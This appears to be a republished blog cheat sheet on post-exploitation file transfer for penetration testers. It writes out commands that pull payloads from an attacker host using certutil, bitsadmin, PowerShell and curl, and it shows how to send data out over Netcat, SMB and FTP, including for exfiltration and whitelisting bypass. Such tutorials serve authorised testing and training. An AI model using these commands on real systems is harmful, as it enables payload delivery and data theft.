Mastering Post-Exploitation File Transfers: The Ultimate Cheat Sheet for Pentesters + Video

By /

Listen to this Post

Featured Image

Introduction:

File transfer is a critical step during post‑exploitation and lateral movement in penetration testing. Security testers often need quick, reliable methods to upload or download files between compromised systems and their attacker machines. This comprehensive guide provides a ready‑to‑use cheat sheet covering native Windows and Linux tools, as well as cross‑platform utilities, to ensure you can move payloads, tools, and exfiltration data seamlessly in any engagement.

Learning Objectives:

  • Master native Windows file transfer techniques using PowerShell, certutil, BITSAdmin, and wget.
  • Leverage Linux command‑line tools like curl, scp, and Netcat for efficient data movement.
  • Set up and use various server‑side protocols (HTTP, SMB, FTP, TFTP) to support flexible file exchange.

You Should Know

1. Native Windows File Transfer Methods

Windows offers several built‑in tools for downloading files during a penetration test. Each has its own strengths and limitations.

Using PowerShell’s WebClient

PowerShell’s `WebClient` class is the most flexible method. It supports HTTP, HTTPS, and FTP and can handle authentication if needed.

 Download a file
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

Upload a file (requires a listening server)
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.141/upload', 'C:\local\file.txt')

Using Windows `wget` (Alias for Invoke-WebRequest)

The `wget` alias in PowerShell is simple but requires the `-OutFile` parameter to save the file.

wget http://192.168.31.141/ignite.txt -o ignite.txt

Using `certutil` – The Certificate Utility

`certutil` is a versatile Windows binary originally designed for certificate management. It can download files and even decode base64 content.

 Basic download
certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

Split large files
certutil -urlcache -split -f http://192.168.31.141/ignite.txt ignite.txt

Using `bitsadmin` – Background Intelligent Transfer Service

BITS is a background file transfer service that works even when the user logs off, making it useful for long downloads.

bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\raj\Desktop\ignite.txt

Step‑by‑Step Guide:

  1. Set up a web server on your attacker machine (e.g., using python3 -m http.server 8000).
  2. On the Windows target, run any of the above commands with the correct URL and output path.
  3. Verify the file with `dir` or type ignite.txt.

2. Linux File Transfer Commands

Linux distributions come with a rich set of command‑line tools for file transfers, many of which are also available on Windows via WSL or compiled binaries.

Using `wget` and `curl`

Both tools are ubiquitous on Linux and can handle HTTP, HTTPS, and FTP.

 wget
wget http://192.168.31.141/ignite.txt

curl
curl http://192.168.31.141/ignite.txt -o ignite.txt

Using `scp` – Secure Copy Protocol

`scp` leverages SSH, providing encryption and authentication. It works across Linux and Windows (with OpenSSH client).

 Upload to Linux target
scp ignite.txt [email protected]:/tmp

Download from Windows target (requires OpenSSH server on Windows)
scp ignite.txt [email protected]:/C:/Temp

Using Netcat (`nc`) – The Swiss Army Knife

Netcat can establish raw TCP connections, making it ideal for file transfers when other protocols are blocked.

On the receiving end (Kali Linux):

nc -lvp 5555 > file.txt

On the sending end (Ubuntu target):

nc 192.168.31.141 5555 < file.txt

Step‑by‑Step Guide:

  1. On your attacker machine, start a Netcat listener: `nc -lvp 5555 > received_file.txt`
    2. On the compromised machine, send the file: `nc 5555 < local_file.txt` 3. The file will be written on the attacker side. Use `cat received_file.txt` to verify.

3. Using SMB for File Transfers

SMB (Server Message Block) is a native Windows protocol for file sharing. It can be used to exfiltrate data or upload tools.

Setting Up an SMB Server on Kali Linux

Use `impacket-smbserver` (part of Impacket) to share a directory.

impacket-smbserver share $(pwd) -smb2support

Accessing the SMB Share from Windows

copy \192.168.31.141\share\ignite.txt

Uploading from Windows to Kali

copy ignite.txt \192.168.31.141\share\ignite.txt

Connecting from Linux via `smbclient`

smbclient -L 192.168.31.141
smbclient "\\192.168.31.141\share"
 Inside the client:
get ignite.txt
put data.txt

Step‑by‑Step Guide:

1. Start `impacket-smbserver` on your attacker machine.

  1. On the Windows target, use `copy` or `move` to interact with the share as if it were a local drive.
  2. For Linux targets, use `smbclient` to list, download, or upload files.

  3. FTP and TFTP – Legacy Protocols for Special Cases

When modern protocols are blocked, FTP or TFTP can sometimes bypass restrictions.

Using Metasploit’s FTP Server

use auxiliary/server/ftp
set srvhost 192.168.31.141
set ftproot /root/raj
set ftpuser raj
set ftppass 123
run

Downloading from Windows

ftp 192.168.31.141
raj
123
get ignite.txt
bye

Using `pyftpdlib` for a Quick FTP Server

python3 -m venv pyftpdlib-venv
source pyftpdlib-venv/bin/activate
pip3 install pyftpdlib
python3 -m pyftpdlib -w -p 21 -u ignite -P 123

TFTP with Metasploit

use auxiliary/server/tftp
set srvhost 192.168.31.141
set tftproot /root/raj
run

Download from Windows

tftp -i 192.168.31.219 GET ignite.txt
dir

Step‑by‑Step Guide:

  1. Start an FTP or TFTP server on your attacker machine (Metasploit or pyftpdlib).
  2. On the Windows target, use the built‑in `ftp` or `tftp` client to connect and retrieve files.
  3. Note that TFTP is unauthenticated and UDP‑based, so it may be unreliable for large files.

5. Setting Up a Quick HTTP Server

Sometimes you just need a lightweight HTTP server to serve files.

Using Python (any version)

 Python 2
python2 -m SimpleHTTPServer 80

Python 3
python3 -m http.server 8000

Using PHP

php -S 0.0.0.0:8081

Using Updog – A Python Replacement

Updog is an improved version of Python’s `SimpleHTTPServer` with better performance and support for uploads.

pip3 install updog
updog -p 80

Step‑by‑Step Guide:

  1. Choose your preferred HTTP server and start it on your attacker machine.
  2. On the target, use any HTTP client (wget, curl, certutil, etc.) to download files from http://<attacker_ip>:<port>/filename.
  3. For uploads, use a tool like `curl -F` or a custom script.

6. Cross‑Platform File Transfers with Netcat

Netcat is invaluable when firewalls block all other protocols. It can be used in both directions.

Send a file from Windows to Kali (requires `nc.exe` on Windows):

On Kali (receiver):

nc -lvp 5555 > data.txt

On Windows (sender):

nc.exe 192.168.31.141 5555 < data.txt

Send a file from Linux to Windows (Windows must have a listening Netcat):

On Windows (receiver):

nc.exe -lvp 5555 > file.txt

On Linux (sender):

nc 192.168.31.219 5555 < file.txt

Step‑by‑Step Guide:

  1. Transfer `nc.exe` to the Windows target if it’s not already present.
  2. On the receiving side, start a listener with output redirection: nc -lvp <port> > received_file.
  3. On the sending side, pipe the file into Netcat: nc <receiver_ip> <port> < file_to_send.

What Undercode Say

  • Flexibility is key: No single file transfer method works in every environment. A pentester must be familiar with at least 5‑6 different techniques to adapt to firewalls, EDRs, and network restrictions.
  • Native tools are your friends: Windows tools like `certutil` and `bitsadmin` are often overlooked but can bypass application whitelisting. Similarly, Linux’s `scp` and `curl` are almost always available.
  • Server‑side setup matters: Quickly spinning up an HTTP, SMB, or FTP server on your attacker machine is a core skill. Tools like Updog and `impacket-smbserver` make this trivial.
  • Netcat remains the ultimate fallback: When all else fails, a raw TCP connection with Netcat works on any platform, provided you have the binary. It’s slow and unencrypted, but it gets the job done.

Analysis: The cheat sheet covers the most common file transfer methods used in real‑world red team operations. The inclusion of both Windows and Linux commands, as well as server‑side setups, makes it a practical reference. However, it lacks coverage of encrypted alternatives (e.g., `rsync` over SSH) and advanced evasion techniques (e.g., splitting files into chunks, using DNS tunneling). Future updates should address these gaps.

Prediction

As enterprises adopt stricter zero‑trust models and next‑gen firewalls, traditional file transfer methods will face increasing scrutiny. We will see a rise in protocol hopping (e.g., moving from HTTP to DNS to ICMP) and the use of legitimate cloud APIs (OneDrive, Dropbox) for covert exfiltration. Additionally, AI‑driven EDRs will begin to detect anomalous file transfer patterns, forcing attackers to adopt more sophisticated, low‑and‑slow data leakage techniques. The cheat sheet of tomorrow will include methods like SSH reverse port forwarding, ICMP tunneling, and WebSocket‑based transfers to bypass modern defenses.

▶️ Related Video (88% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: File Transfer – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: